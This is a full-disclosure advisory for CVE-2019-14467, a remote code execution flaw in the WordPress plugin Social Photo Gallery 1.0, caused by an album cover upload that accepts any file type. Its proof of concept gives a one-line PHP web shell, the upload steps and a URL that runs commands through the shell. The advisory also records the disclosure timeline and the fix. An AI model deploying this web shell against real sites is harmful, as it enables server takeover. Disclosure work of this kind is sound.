WordPress Social Photo Gallery 1.0 Remote Code Execution

`  
=============================================  
PRESTIGIA SEGURIDAD ALERT 2019-001  
- Original release date: July 31, 2019  
- Last revised: November 13, 2019  
- Discovered by: Prestigia Seguridad  
- Severity: 7,5/10 (CVSS Base Score)  
- CVE-ID: CVE-2019-14467  
=============================================  
  
I. VULNERABILITY  
-------------------------  
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution  
  
II. BACKGROUND  
-------------------------  
Social Gallery is the ultimate lightbox plugin for WordPress. Your images   
deserve to be experienced and shared, to spark a response as they travel   
the social web, and to work for you by generating more fans and more Likes   
for your content.  
  
III. DESCRIPTION  
-------------------------  
The version of WordPress Plugin Social Photo Gallery is affected by a   
Remote Code Execution vulnerability.  
  
The application does not check the extension when a imagen of a album is   
uploaded, resulting in a execution of php code.  
  
To exploit the vulnerability only is needed create a album in the   
application and attach a malicious php file in the cover photo album.  
  
IV. PROOF OF CONCEPT  
-------------------------  
  
1. Create a .php archive (cmd.php):  
  
<?php system($_GET['cmd']); ?>  
  
2. Click Add Album, select the name, for example "demo" and in the "Cover   
Photo" select the cmd.php file.  
  
3. Load the next URL and magic:  
  
http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls  
  
V. BUSINESS IMPACT  
-------------------------  
Execute local commands in the server result from these attacks.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
WordPress Plugin Social Photo Gallery 1.0  
  
VII. SOLUTION  
-------------------------  
The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG  
  
VIII. REFERENCES  
-------------------------  
https://wordpress.org/plugins/social-photo-gallery/  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported by Prestigia Seguridad  
Email: [email protected]  
  
X. REVISION HISTORY  
-------------------------  
July 31, 2019 1: Initial release  
November 13, 2019 2: Revision to send to lists  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad  
July 31, 2019 2: Email to vendor without response  
August 15, 2019 3: Second email to vendor without response  
November 13, 2019 4: Send to the Full-Disclosure lists  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with no   
warranties or guarantees of fitness of use or otherwise.  
  
XIII. ABOUT  
-------------------------  
Prestigia Seguridad  
https://seguridad.prestigia.es/  
  
  
`